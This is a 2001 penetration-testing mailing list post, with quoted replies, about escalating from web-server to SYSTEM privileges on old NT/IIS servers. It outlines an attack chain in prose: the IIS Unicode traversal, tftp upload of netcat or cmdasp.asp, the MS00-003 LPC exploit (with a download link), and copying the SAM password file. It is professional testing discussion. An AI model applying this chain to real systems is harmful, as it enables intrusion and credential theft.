Re: [PEN-TEST] Expand right under Win2K

[Complx1 * <complx1 () HUSHMAIL COM>]

maybe im mistaken, but the answers dont seem to match the question.
then again, it could be the skill of others clouding my understanding.
-understanding is relative
nonetheless

On recent pen tests this subject has been a major issue for two reasons.
#1) unicode is still un-aged as a vulnerability
#2) it does not allow full compromise in a one -two step like rds

i regret i cannot offer a fully working scenario, because i do not have
one
as of yet.  I would refrain from installing bo2k under all circumstances
for
the simple reason that any competent admin would have antivirus software
running on the target server.
Assuming weak firewall or no firewall , service enumeration could easily
eliminate this possibility for those who might travel that route.
I have tested cmdasp.asp internally , and found it an simple but *amazing*
tool.  it does not offer admin/system/authority level commands as far as
i know or have experienced.

I have put together a scenario in notes , to test in the future or at the
first
available time. I have tested once in a full pen test (only once) but the
results
were negative.  There was every indication that it was a success, so this
made it a high priority for internal testing at next available time in controlled
environment. (my home lab is all w2k/nix and IIS5 =((

(babble mode off)

Scenario requirements:
Target server = NT 4.0 , IIS 4.0 , (patch levels will vary results)
Remote Penetration exploit = unicode web folder traversal
Local Escalation Exploit =  LPC port request

Using unicode exploit on target nt 4.0 IIS 4.0 server we use the extended
information , tftp to upload your choice of netcat or the cmdasp.asp.
Both spawned from unicode , via IUSR_blah permissions of web process.

When netcat port is open , or cmdasp allows execution, issue tftp and
upload the LPC PORT local exploit to the target server.

(( information below taken from nmrc.org)
The LPC exploit is identified by microsoft MS00-003

Their description of the exploit is as follows:
====================================
Todd Sabin's exploit of the bug mentioned in MS00-003
in January of 2000. Allows command execution as
SYSTEM by a local user. Works on NT up through SP6.

The compiled executeable can be found at
http://nmrc.org/files/nt/hk-0.1.zip

The microsoft information is here
http://www.microsoft.com/technet/security/bulletin/ms00-003.asp

In the legit pen test, i issued a copy sam to webpub via the lpc exploit.
the output of exploit was positive however the file did not exist afterwards.
Since this was remote test, i gave it one shot, and decided to keep moving
down the list to the other bucket of toys they had for me to play with.

But this is the working model im testing.. if anyone has a positive result
or
comment, even flame.   do your thing.. its a free world.

.complx1

At Tue, 9 Jan 2001 16:17:53 -0500, Paul Cardon <paul () MOQUIJO COM> wrote:

> Charlie Rhodes wrote:
> > > We have a win2k where we have access to a cmd.exe with the rights
> of the
> > > web-server and we would like to obtain administrator rights. Also
> we
> > > don't have the rights to read the SAM files.
> > > We tried the well-known methdos under win  NT 4.0 (like breaknt.exe,
> > > read from raw device) in vain.
> >
> >     Do you have network (ftp) access?  or floppy access?
> > http://www.bo2k.com should do the trick.  You'll probably want to
> configure
> > the server part off the machine, then load it on.
>
> This is the second time this question has been asked on the list and
> almost everybody misunderstands the problem.  Let me restate it:
>
> Suppose a pen-tester has used the IIS Unicode vulnerability to download
> a back door such as a netcat listener to the target Win2K server and
> now
> has a remote cmd shell.  At this point the remote shell is running with
> IUSR_<MACHINE> privilege since that is the privilege level that the
> Unicode vulnerability provides.
>
> Now, how does the pen-tester elevate privilege to Administrator?
>
> Any software that is downloaded (tftp, ftp, whatever) through the remote
> command shell will only run with IUSR_<MACHINE> privilege.  Why do
> people think that downloading BO2K, netcat, or some such will magically
> elevate privilege?  It doesn't.
>
> The only things that are possible are:
>
> 1)  There is a known privilege escalation vulnerability that can be
> exploited with local unprivileged access.  The attacker can download
> and
> run that code to gain Administrator access.
>
> 2)  Brute force attack against accounts with local Administrator
> privilege.
>
> 3)  Look for vulnerabilities in other systems that the web server can
> talk to.  Some of those may expose Domain accounts with Administrator
> privilege on the web server or other systems that are trusted by the
> web
> server.
>
> There are others but Win2K does limit some of the nicer possibilities
> that existed with NT.
>
> -paul